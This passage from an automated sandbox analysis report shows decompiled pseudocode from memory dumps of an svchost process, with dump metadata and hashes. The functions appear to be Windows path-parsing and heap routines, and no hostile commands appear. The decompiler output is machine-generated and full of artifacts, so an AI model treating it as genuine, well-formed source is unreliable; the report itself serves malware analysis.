                        																	E0306F3E0( *(_t528 - 0xb8), _t457, _t506);
                        																	_t529 = _t529 + 0xc;
                        																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                        																} else {
                        																	__eflags = _t340 == 0;
                        																	if(_t340 == 0) {
                        																		__eflags = _t506 - 8;
                        																		if(_t506 == 8) {
                        																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                        																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                        																		}
                        																	}
                        																}
                        															}
                        															_t339 = 0x10;
                        															_t519 = _t519 + _t339;
                        															_t263 = _t528 - 0x8c;
                        															 *_t263 =  *(_t528 - 0x8c) - 1;
                        															__eflags =  *_t263;
                        															_t479 =  *(_t528 - 0x78);
                        														} while ( *_t263 != 0);
                        														goto L87;
                        													}
                        												}
                        											} else {
                        												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                        												 *(_t528 - 0xa2) = _t392;
                        												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                        												__eflags = _t469;
                        												while(1) {
                        													 *(_t528 - 0xe4) = _t511;
                        													__eflags = _t392;
                        													_t393 = _t427;
                        													if(_t392 != 0) {
                        														_t393 =  *((intOrPtr*)(_t469 + 4));
                        													}
                        													_t395 = (_t393 & 0x000000ff) - _t427;
                        													__eflags = _t395;
                        													if(_t395 == 0) {
                        														_t511 = _t511 +  *_t469;
                        														__eflags = _t511;
                        													} else {
                        														_t398 = _t395 - 1;
                        														__eflags = _t398;
                        														if(_t398 == 0) {
                        															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                        															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                        														} else {
                        															__eflags = _t398 == 1;
                        															if(_t398 == 1) {
                        																 *(_t528 - 0xa8) =  *(_t469 - 8);
                        																_t402 =  *_t469 & 0x0000ffff;
                        																 *(_t528 - 0xac) = _t402;
                        																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                        															}
                        														}
                        													}
                        													__eflags = _t511 -  *(_t528 - 0xe4);
                        													if(_t511 <  *(_t528 - 0xe4)) {
                        														break;
                        													}
                        													_t397 =  *(_t528 - 0x88) + 1;
                        													 *(_t528 - 0x88) = _t397;
                        													_t469 = _t469 + 0x10;
                        													__eflags = _t397 -  *(_t528 + 0x1c);
                        													_t392 =  *(_t528 - 0xa2);
                        													if(_t397 <  *(_t528 + 0x1c)) {
                        														continue;
                        													}
                        													goto L45;
                        												}
                        												_t475 = 0x216;
                        												 *(_t528 - 0x74) = 0x216;
                        												goto L45;
                        											}
                        										} else {
                        											asm("lock dec dword [eax+ecx*8+0x4]");
                        											goto L16;
                        										}
                        									}
                        									_t491 = E030F4CAB(_t306, _t528 - 0xa4);
                        									 *(_t528 - 0x74) = _t491;
                        									__eflags = _t491;
                        									if(_t491 != 0) {
                        										goto L91;
                        									} else {
                        										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                        										goto L20;
                        									}
                        								}
                        								L16:
                        								 *(_t528 - 0x74) = 0x1069;
                        								L93:
                        								_t298 =  *(_t528 - 0xd0) + 1;
                        								 *(_t528 - 0xd0) = _t298;
                        								_t474 = _t474 + _t511;
                        								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                        								_t494 = 4;
                        								__eflags = _t298 - _t494;
                        								if(_t298 >= _t494) {
                        									goto L100;
                        								}
                        								_t494 =  *(_t528 - 0xcc);
                        								_t435 = _t298;
                        								continue;
                        							}
                        							__eflags = _t494[2] | _t494[3];
                        							if((_t494[2] | _t494[3]) == 0) {
                        								goto L15;
                        							}
                        							goto L12;
                        						}
                        						__eflags = _t301;
                        						if(_t301 != 0) {
                        							goto L92;
                        						}
                        						goto L10;
                        						L92:
                        						goto L93;
                        					}
                        				} else {
                        					_push(0x57);
                        					L101:
                        					return E0307D130(_t427, _t494, _t511);
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dbe495c02752569d49e8df2baebe24c711a9869f546ef072e81c498214ee88e2
                        • Instruction ID: cdd1e401b50756c836603780e2bda0fbc5346d530a7f1d44117b7e642f60c9b2
                        • Opcode Fuzzy Hash: dbe495c02752569d49e8df2baebe24c711a9869f546ef072e81c498214ee88e2
                        • Instruction Fuzzy Hash: 14426875901229CFDB64CF68C880BA9B7F1FF49304F1881AAD94DAB642E7359A85CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E03044120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                        				signed int _v8;
                        				void* _v20;
                        				signed int _v24;
                        				char _v532;
                        				char _v540;
                        				signed short _v544;
                        				signed int _v548;
                        				signed short* _v552;
                        				signed short _v556;
                        				signed short* _v560;
                        				signed short* _v564;
                        				signed short* _v568;
                        				void* _v570;
                        				signed short* _v572;
                        				signed short _v576;
                        				signed int _v580;
                        				char _v581;
                        				void* _v584;
                        				unsigned int _v588;
                        				signed short* _v592;
                        				void* _v597;
                        				void* _v600;
                        				void* _v604;
                        				void* _v609;
                        				void* _v616;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				unsigned int _t161;
                        				signed int _t162;
                        				unsigned int _t163;
                        				void* _t169;
                        				signed short _t173;
                        				signed short _t177;
                        				signed short _t181;
                        				unsigned int _t182;
                        				signed int _t185;
                        				signed int _t213;
                        				signed int _t225;
                        				short _t233;
                        				signed char _t234;
                        				signed int _t242;
                        				signed int _t243;
                        				signed int _t244;
                        				signed int _t245;
                        				signed int _t250;
                        				void* _t251;
                        				signed short* _t254;
                        				void* _t255;
                        				signed int _t256;
                        				void* _t257;
                        				signed short* _t260;
                        				signed short _t265;
                        				signed short* _t269;
                        				signed short _t271;
                        				signed short** _t272;
                        				signed short* _t275;
                        				signed short _t282;
                        				signed short _t283;
                        				signed short _t290;
                        				signed short _t299;
                        				signed short _t307;
                        				signed int _t308;
                        				signed short _t311;
                        				signed short* _t315;
                        				signed short _t316;
                        				void* _t317;
                        				void* _t319;
                        				signed short* _t321;
                        				void* _t322;
                        				void* _t323;
                        				unsigned int _t324;
                        				signed int _t325;
                        				void* _t326;
                        				signed int _t327;
                        				signed int _t329;
                        
                        				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                        				_v8 =  *0x311d360 ^ _t329;
                        				_t157 = _a8;
                        				_t321 = _a4;
                        				_t315 = __edx;
                        				_v548 = __ecx;
                        				_t305 = _a20;
                        				_v560 = _a12;
                        				_t260 = _a16;
                        				_v564 = __edx;
                        				_v580 = _a8;
                        				_v572 = _t260;
                        				_v544 = _a20;
                        				if( *__edx <= 8) {
                        					L3:
                        					if(_t260 != 0) {
                        						 *_t260 = 0;
                        					}
                        					_t254 =  &_v532;
                        					_v588 = 0x208;
                        					if((_v548 & 0x00000001) != 0) {
                        						_v556 =  *_t315;
                        						_v552 = _t315[2];
                        						_t161 = E0305F232( &_v556);
                        						_t316 = _v556;
                        						_v540 = _t161;
                        						goto L17;
                        					} else {
                        						_t306 = 0x208;
                        						_t298 = _t315;
                        						_t316 = E03046E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                        						if(_t316 == 0) {
                        							L68:
                        							_t322 = 0xc0000033;
                        							goto L39;
                        						} else {
                        							while(_v581 == 0) {
                        								_t233 = _v588;
                        								if(_t316 > _t233) {
                        									_t234 = _v548;
                        									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                        										_t254 = L03044620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                        										if(_t254 == 0) {
                        											_t169 = 0xc0000017;
                        										} else {
                        											_t298 = _v564;
                        											_v588 = _t316;
                        											_t306 = _t316;
                        											_t316 = E03046E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                        											if(_t316 != 0) {
                        												continue;
                        											} else {
                        												goto L68;
                        											}
                        										}
                        									} else {
                        										goto L90;
                        									}
                        								} else {
                        									_v556 = _t316;
                        									 *((short*)(_t329 + 0x32)) = _t233;
                        									_v552 = _t254;
                        									if(_t316 < 2) {
                        										L11:
                        										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                        											_t161 = 5;
                        										} else {
                        											if(_t316 < 6) {
                        												L87:
                        												_t161 = 3;
                        											} else {
                        												_t242 = _t254[2] & 0x0000ffff;
                        												if(_t242 != 0x5c) {
                        													if(_t242 == 0x2f) {
                        														goto L16;
                        													} else {
                        														goto L87;
                        													}
                        													goto L101;
                        												} else {
                        													L16:
                        													_t161 = 2;
                        												}
                        											}
                        										}
                        									} else {
                        										_t243 =  *_t254 & 0x0000ffff;
                        										if(_t243 == 0x5c || _t243 == 0x2f) {
                        											if(_t316 < 4) {
                        												L81:
                        												_t161 = 4;
                        												goto L17;
                        											} else {
                        												_t244 = _t254[1] & 0x0000ffff;
                        												if(_t244 != 0x5c) {
                        													if(_t244 == 0x2f) {
                        														goto L60;
                        													} else {
                        														goto L81;
                        													}
                        												} else {
                        													L60:
                        													if(_t316 < 6) {
                        														L83:
                        														_t161 = 1;
                        														goto L17;
                        													} else {
                        														_t245 = _t254[2] & 0x0000ffff;
                        														if(_t245 != 0x2e) {
                        															if(_t245 == 0x3f) {
                        																goto L62;
                        															} else {
                        																goto L83;
                        															}
                        														} else {
                        															L62:
                        															if(_t316 < 8) {
                        																L85:
                        																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                        																goto L17;
                        															} else {
                        																_t250 = _t254[3] & 0x0000ffff;
                        																if(_t250 != 0x5c) {
                        																	if(_t250 == 0x2f) {
                        																		goto L64;
                        																	} else {
                        																		goto L85;
                        																	}
                        																} else {
                        																	L64:
                        																	_t161 = 6;
                        																	goto L17;
                        																}
                        															}
                        														}
                        													}
                        												}
                        											}
                        											goto L101;
                        										} else {
                        											goto L11;
                        										}
                        									}
                        									L17:
                        									if(_t161 != 2) {
                        										_t162 = _t161 - 1;
                        										if(_t162 > 5) {
                        											goto L18;
                        										} else {
                        											switch( *((intOrPtr*)(_t162 * 4 +  &M030445F8))) {
                        												case 0:
                        													_v568 = 0x3001078;
                        													__eax = 2;
                        													goto L20;
                        												case 1:
                        													goto L18;
                        												case 2:
                        													_t163 = 4;
                        													goto L19;
                        											}
                        										}
                        										goto L41;
                        									} else {
                        										L18:
                        										_t163 = 0;
                        										L19:
                        										_v568 = 0x30011c4;
                        									}
                        									L20:
                        									_v588 = _t163;
                        									_v564 = _t163 + _t163;
                        									_t306 =  *_v568 & 0x0000ffff;
                        									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                        									_v576 = _t265;
                        									if(_t265 > 0xfffe) {
                        										L90:
                        										_t322 = 0xc0000106;
                        									} else {
                        										if(_t321 != 0) {
                        											if(_t265 > (_t321[1] & 0x0000ffff)) {
                        												if(_v580 != 0) {
                        													goto L23;
                        												} else {
                        													_t322 = 0xc0000106;
                        													goto L39;
                        												}
                        											} else {
                        												_t177 = _t306;
                        												goto L25;
                        											}
                        											goto L101;
                        										} else {
                        											if(_v580 == _t321) {
                        												_t322 = 0xc000000d;
                        											} else {
                        												L23:
                        												_t173 = L03044620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                        												_t269 = _v592;
                        												_t269[2] = _t173;
                        												if(_t173 == 0) {
                        													_t322 = 0xc0000017;
                        												} else {
                        													_t316 = _v556;
                        													 *_t269 = 0;
                        													_t321 = _t269;
                        													_t269[1] = _v576;
                        													_t177 =  *_v568 & 0x0000ffff;
                        													L25:
                        													_v580 = _t177;
                        													if(_t177 == 0) {
                        														L29:
                        														_t307 =  *_t321 & 0x0000ffff;
                        													} else {
                        														_t290 =  *_t321 & 0x0000ffff;
                        														_v576 = _t290;
                        														_t310 = _t177 & 0x0000ffff;
                        														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                        															_t307 =  *_t321 & 0xffff;
                        														} else {
                        															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                        															E0306F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                        															_t329 = _t329 + 0xc;
                        															_t311 = _v580;
                        															_t225 =  *_t321 + _t311 & 0x0000ffff;
                        															 *_t321 = _t225;
                        															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                        																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                        															}
                        															goto L29;
                        														}
                        													}
                        													_t271 = _v556 - _v588 + _v588;
                        													_v580 = _t307;
                        													_v576 = _t271;
                        													if(_t271 != 0) {
                        														_t308 = _t271 & 0x0000ffff;
                        														_v588 = _t308;
                        														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                        															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                        															E0306F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                        															_t329 = _t329 + 0xc;
                        															_t213 =  *_t321 + _v576 & 0x0000ffff;
                        															 *_t321 = _t213;
                        															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                        																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                        															}
                        														}
                        													}
                        													_t272 = _v560;
                        													if(_t272 != 0) {
                        														 *_t272 = _t321;
                        													}
                        													_t306 = 0;
                        													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                        													_t275 = _v572;
                        													if(_t275 != 0) {
                        														_t306 =  *_t275;
                        														if(_t306 != 0) {
                        															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                        														}
                        													}
                        													_t181 = _v544;
                        													if(_t181 != 0) {
                        														 *_t181 = 0;
                        														 *((intOrPtr*)(_t181 + 4)) = 0;
                        														 *((intOrPtr*)(_t181 + 8)) = 0;
                        														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                        														if(_v540 == 5) {
                        															_t182 = E030252A5(1);
                        															_v588 = _t182;
                        															if(_t182 == 0) {
                        																E0303EB70(1, 0x31179a0);
                        																goto L38;
                        															} else {
                        																_v560 = _t182 + 0xc;
                        																_t185 = E0303AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                        																if(_t185 == 0) {
                        																	_t324 = _v588;
                        																	goto L97;
                        																} else {
                        																	_t306 = _v544;
                        																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                        																	 *(_t306 + 4) = _t282;
                        																	_v576 = _t282;
                        																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                        																	 *_t306 = _t325;
                        																	if( *_t282 == 0x5c) {
                        																		_t149 = _t325 - 2; // -2
                        																		_t283 = _t149;
                        																		 *_t306 = _t283;
                        																		 *(_t306 + 4) = _v576 + 2;
                        																		_t185 = _t283 & 0x0000ffff;
                        																	}
                        																	_t324 = _v588;
                        																	 *(_t306 + 2) = _t185;
                        																	if((_v548 & 0x00000002) == 0) {
                        																		L97:
                        																		asm("lock xadd [esi], eax");
                        																		if((_t185 | 0xffffffff) == 0) {
                        																			_push( *((intOrPtr*)(_t324 + 4)));
                        																			E030695D0();
                        																			L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                        																		}
                        																	} else {
                        																		 *(_t306 + 0xc) = _t324;
                        																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                        																	}
                        																	goto L38;
                        																}
                        															}
                        															goto L41;
                        														}
                        													}
                        													L38:
                        													_t322 = 0;
                        												}
                        											}
                        										}
                        									}
                        									L39:
                        									if(_t254 !=  &_v532) {
                        										L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                        									}
                        									_t169 = _t322;
                        								}
                        								goto L41;
                        							}
                        							goto L68;
                        						}
                        					}
                        					L41:
                        					_pop(_t317);
                        					_pop(_t323);
                        					_pop(_t255);
                        					return E0306B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                        				} else {
                        					_t299 = __edx[2];
                        					if( *_t299 == 0x5c) {
                        						_t256 =  *(_t299 + 2) & 0x0000ffff;
                        						if(_t256 != 0x5c) {
                        							if(_t256 != 0x3f) {
                        								goto L2;
                        							} else {
                        								goto L50;
                        							}
                        						} else {
                        							L50:
                        							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                        								goto L2;
                        							} else {
                        								_t251 = E03063D43(_t315, _t321, _t157, _v560, _v572, _t305);
                        								_pop(_t319);
                        								_pop(_t326);
                        								_pop(_t257);
                        								return E0306B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                        							}
                        						}
                        					} else {
                        						L2:
                        						_t260 = _v572;
                        						goto L3;
                        					}
                        				}
                        				L101:
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 01608686a06fb628ea9efddb6a6dbc6829f0c76cae1005b38fd0a388ee88a9fc
                        • Instruction ID: 29a9986754286b4432a89cad32014de5c8f316f8f7f1dead9da5d05970e095c7
                        • Opcode Fuzzy Hash: 01608686a06fb628ea9efddb6a6dbc6829f0c76cae1005b38fd0a388ee88a9fc
                        • Instruction Fuzzy Hash: 05F17DB460A3118BCB64DF1AC480B7AB7E5FF88714F59496EF885CB250E734DA81CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E030520A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                        				signed int _v16;
                        				signed int _v20;
                        				signed char _v24;
                        				intOrPtr _v28;
                        				signed int _v32;
                        				void* _v36;
                        				char _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				unsigned int _v60;
                        				char _v64;
                        				unsigned int _v68;
                        				signed int _v72;
                        				char _v73;
                        				signed int _v74;
                        				char _v75;
                        				signed int _v76;
                        				void* _v81;
                        				void* _v82;
                        				void* _v89;
                        				void* _v92;
                        				void* _v97;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed char _t128;
                        				void* _t129;
                        				signed int _t130;
                        				void* _t132;
                        				signed char _t133;
                        				intOrPtr _t135;
                        				signed int _t137;
                        				signed int _t140;
                        				signed int* _t144;
                        				signed int* _t145;
                        				intOrPtr _t146;
                        				signed int _t147;
                        				signed char* _t148;
                        				signed int _t149;
                        				signed int _t153;
                        				signed int _t169;
                        				signed int _t174;
                        				signed int _t180;
                        				void* _t197;
                        				void* _t198;
                        				signed int _t201;
                        				intOrPtr* _t202;
                        				intOrPtr* _t205;
                        				signed int _t210;
                        				signed int _t215;
                        				signed int _t218;
                        				signed char _t221;
                        				signed int _t226;
                        				char _t227;
                        				signed int _t228;
                        				void* _t229;
                        				unsigned int _t231;
                        				void* _t235;
                        				signed int _t240;
                        				signed int _t241;
                        				void* _t242;
                        				signed int _t246;
                        				signed int _t248;
                        				signed int _t252;
                        				signed int _t253;
                        				void* _t254;
                        				intOrPtr* _t256;
                        				intOrPtr _t257;
                        				unsigned int _t262;
                        				signed int _t265;
                        				void* _t267;
                        				signed int _t275;
                        
                        				_t198 = __ebx;
                        				_t267 = (_t265 & 0xfffffff0) - 0x48;
                        				_v68 = __ecx;
                        				_v73 = 0;
                        				_t201 = __edx & 0x00002000;
                        				_t128 = __edx & 0xffffdfff;
                        				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                        				_v72 = _t128;
                        				if((_t128 & 0x00000008) != 0) {
                        					__eflags = _t128 - 8;
                        					if(_t128 != 8) {
                        						L69:
                        						_t129 = 0xc000000d;
                        						goto L23;
                        					} else {
                        						_t130 = 0;
                        						_v72 = 0;
                        						_v75 = 1;
                        						L2:
                        						_v74 = 1;
                        						_t226 =  *0x3118714; // 0x0
                        						if(_t226 != 0) {
                        							__eflags = _t201;
                        							if(_t201 != 0) {
                        								L62:
                        								_v74 = 1;
                        								L63:
                        								_t130 = _t226 & 0xffffdfff;
                        								_v72 = _t130;
                        								goto L3;
                        							}
                        							_v74 = _t201;
                        							__eflags = _t226 & 0x00002000;
                        							if((_t226 & 0x00002000) == 0) {
                        								goto L63;
                        							}
                        							goto L62;
                        						}
                        						L3:
                        						_t227 = _v75;
                        						L4:
                        						_t240 = 0;
                        						_v56 = 0;
                        						_t252 = _t130 & 0x00000100;
                        						if(_t252 != 0 || _t227 != 0) {
                        							_t240 = _v68;
                        							_t132 = E03052EB0(_t240);
                        							__eflags = _t132 - 2;
                        							if(_t132 != 2) {
                        								__eflags = _t132 - 1;
                        								if(_t132 == 1) {
                        									goto L25;
                        								}
                        								__eflags = _t132 - 6;
                        								if(_t132 == 6) {
                        									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                        									if( *((short*)(_t240 + 4)) != 0x3f) {
                        										goto L40;
                        									}
                        									_t197 = E03052EB0(_t240 + 8);
                        									__eflags = _t197 - 2;
                        									if(_t197 == 2) {
                        										goto L25;
                        									}
                        								}
                        								L40:
                        								_t133 = 1;
                        								L26:
                        								_t228 = _v75;
                        								_v56 = _t240;
                        								__eflags = _t133;
                        								if(_t133 != 0) {
                        									__eflags = _t228;
                        									if(_t228 == 0) {
                        										L43:
                        										__eflags = _v72;
                        										if(_v72 == 0) {
                        											goto L8;
                        										}
                        										goto L69;
                        									}
                        									_t133 = E030258EC(_t240);
                        									_t221 =  *0x3115cac; // 0x16
                        									__eflags = _t221 & 0x00000040;
                        									if((_t221 & 0x00000040) != 0) {
                        										_t228 = 0;
                        										__eflags = _t252;
                        										if(_t252 != 0) {
                        											goto L43;
                        										}
                        										_t133 = _v72;
                        										goto L7;
                        									}
                        									goto L43;
                        								} else {
                        									_t133 = _v72;
                        									goto L6;
                        								}
                        							}
                        							L25:
                        							_t133 = _v73;
                        							goto L26;
                        						} else {
                        							L6:
                        							_t221 =  *0x3115cac; // 0x16
                        							L7:
                        							if(_t133 != 0) {
                        								__eflags = _t133 & 0x00001000;
                        								if((_t133 & 0x00001000) != 0) {
                        									_t133 = _t133 | 0x00000a00;
                        									__eflags = _t221 & 0x00000004;
                        									if((_t221 & 0x00000004) != 0) {
                        										_t133 = _t133 | 0x00000400;
                        									}
                        								}
                        								__eflags = _t228;
                        								if(_t228 != 0) {
                        									_t133 = _t133 | 0x00000100;
                        								}
                        								_t229 = E03064A2C(0x3116e40, 0x3064b30, _t133, _t240);
                        								__eflags = _t229;
                        								if(_t229 == 0) {
                        									_t202 = _a20;
                        									goto L100;
                        								} else {
                        									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                        									L15:
                        									_t202 = _a20;
                        									 *_t202 = _t135;
                        									if(_t229 == 0) {
                        										L100:
                        										 *_a4 = 0;
                        										_t137 = _a8;
                        										__eflags = _t137;
                        										if(_t137 != 0) {
                        											 *_t137 = 0;
                        										}
                        										 *_t202 = 0;
                        										_t129 = 0xc0000017;
                        										goto L23;
                        									} else {
                        										_t242 = _a16;
                        										if(_t242 != 0) {
                        											_t254 = _t229;
                        											memcpy(_t242, _t254, 0xd << 2);
                        											_t267 = _t267 + 0xc;
                        											_t242 = _t254 + 0x1a;
                        										}
                        										_t205 = _a4;
                        										_t25 = _t229 + 0x48; // 0x48
                        										 *_t205 = _t25;
                        										_t140 = _a8;
                        										if(_t140 != 0) {
                        											__eflags =  *((char*)(_t267 + 0xa));
                        											if( *((char*)(_t267 + 0xa)) != 0) {
                        												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                        											} else {
                        												 *_t140 = 0;
                        											}
                        										}
                        										_t256 = _a12;
                        										if(_t256 != 0) {
                        											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                        										}
                        										_t257 =  *_t205;
                        										_v48 = 0;
                        										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                        										_v56 = 0;
                        										_v52 = 0;
                        										_t144 =  *( *[fs:0x30] + 0x50);
                        										if(_t144 != 0) {
                        											__eflags =  *_t144;
                        											if( *_t144 == 0) {
                        												goto L20;
                        											}
                        											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                        											goto L21;
                        										} else {
                        											L20:
                        											_t145 = 0x7ffe0384;
                        											L21:
                        											if( *_t145 != 0) {
                        												_t146 =  *[fs:0x30];
                        												__eflags =  *(_t146 + 0x240) & 0x00000004;
                        												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                        													_t147 = E03047D50();
                        													__eflags = _t147;
                        													if(_t147 == 0) {
                        														_t148 = 0x7ffe0385;
                        													} else {
                        														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                        													}
                        													__eflags =  *_t148 & 0x00000020;
                        													if(( *_t148 & 0x00000020) != 0) {
                        														_t149 = _v72;
                        														__eflags = _t149;
                        														if(__eflags == 0) {
                        															_t149 = 0x3005c80;
                        														}
                        														_push(_t149);
                        														_push( &_v48);
                        														 *((char*)(_t267 + 0xb)) = E0305F6E0(_t198, _t242, _t257, __eflags);
                        														_push(_t257);
                        														_push( &_v64);
                        														_t153 = E0305F6E0(_t198, _t242, _t257, __eflags);
                        														__eflags =  *((char*)(_t267 + 0xb));
                        														if( *((char*)(_t267 + 0xb)) != 0) {
                        															__eflags = _t153;
                        															if(_t153 != 0) {
                        																__eflags = 0;
                        																E030A7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                        																L03042400(_t267 + 0x20);
                        															}
                        															L03042400( &_v64);
                        														}
                        													}
                        												}
                        											}
                        											_t129 = 0;
                        											L23:
                        											return _t129;
                        										}
                        									}
                        								}
                        							}
                        							L8:
                        							_t275 = _t240;
                        							if(_t275 != 0) {
                        								_v73 = 0;
                        								_t253 = 0;
                        								__eflags = 0;
                        								L29:
                        								_push(0);
                        								_t241 = E03052397(_t240);
                        								__eflags = _t241;
                        								if(_t241 == 0) {
                        									_t229 = 0;
                        									L14:
                        									_t135 = 0;
                        									goto L15;
                        								}
                        								__eflags =  *((char*)(_t267 + 0xb));
                        								 *(_t241 + 0x34) = 1;
                        								if( *((char*)(_t267 + 0xb)) != 0) {
                        									E03042280(_t134, 0x3118608);
                        									__eflags =  *0x3116e48 - _t253; // 0x0
                        									if(__eflags != 0) {
                        										L48:
                        										_t253 = 0;
                        										__eflags = 0;
                        										L49:
                        										E0303FFB0(_t198, _t241, 0x3118608);
                        										__eflags = _t253;
                        										if(_t253 != 0) {
                        											L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                        										}
                        										goto L31;
                        									}
                        									 *0x3116e48 = _t241;
                        									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                        									__eflags = _t253;
                        									if(_t253 != 0) {
                        										_t57 = _t253 + 0x34;
                        										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                        										__eflags =  *_t57;
                        										if( *_t57 == 0) {
                        											goto L49;
                        										}
                        									}
                        									goto L48;
                        								}
                        								L31:
                        								_t229 = _t241;
                        								goto L14;
                        							}
                        							_v73 = 1;
                        							_v64 = _t240;
                        							asm("lock bts dword [esi], 0x0");
                        							if(_t275 < 0) {
                        								_t231 =  *0x3118608; // 0x0
                        								while(1) {
                        									_v60 = _t231;
                        									__eflags = _t231 & 0x00000001;
                        									if((_t231 & 0x00000001) != 0) {
                        										goto L76;
                        									}
                        									_t73 = _t231 + 1; // 0x1
                        									_t210 = _t73;
                        									asm("lock cmpxchg [edi], ecx");
                        									__eflags = _t231 - _t231;
                        									if(_t231 != _t231) {
                        										L92:
                        										_t133 = E03056B90(_t210,  &_v64);
                        										_t262 =  *0x3118608; // 0x0
                        										L93:
                        										_t231 = _t262;
                        										continue;
                        									}
                        									_t240 = _v56;
                        									goto L10;
                        									L76:
                        									_t169 = E0305E180(_t133);
                        									__eflags = _t169;
                        									if(_t169 != 0) {
                        										_push(0xc000004b);
                        										_push(0xffffffff);
                        										E030697C0();
                        										_t231 = _v68;
                        									}
                        									_v72 = 0;
                        									_v24 =  *( *[fs:0x18] + 0x24);
                        									_v16 = 3;
                        									_v28 = 0;
                        									__eflags = _t231 & 0x00000002;
                        									if((_t231 & 0x00000002) == 0) {
                        										_v32 =  &_v36;
                        										_t174 = _t231 >> 4;
                        										__eflags = 1 - _t174;
                        										_v20 = _t174;
                        										asm("sbb ecx, ecx");
                        										_t210 = 3 |  &_v36;
                        										__eflags = _t174;
                        										if(_t174 == 0) {
                        											_v20 = 0xfffffffe;
                        										}
                        									} else {
                        										_v32 = 0;
                        										_v20 = 0xffffffff;
                        										_v36 = _t231 & 0xfffffff0;
                        										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
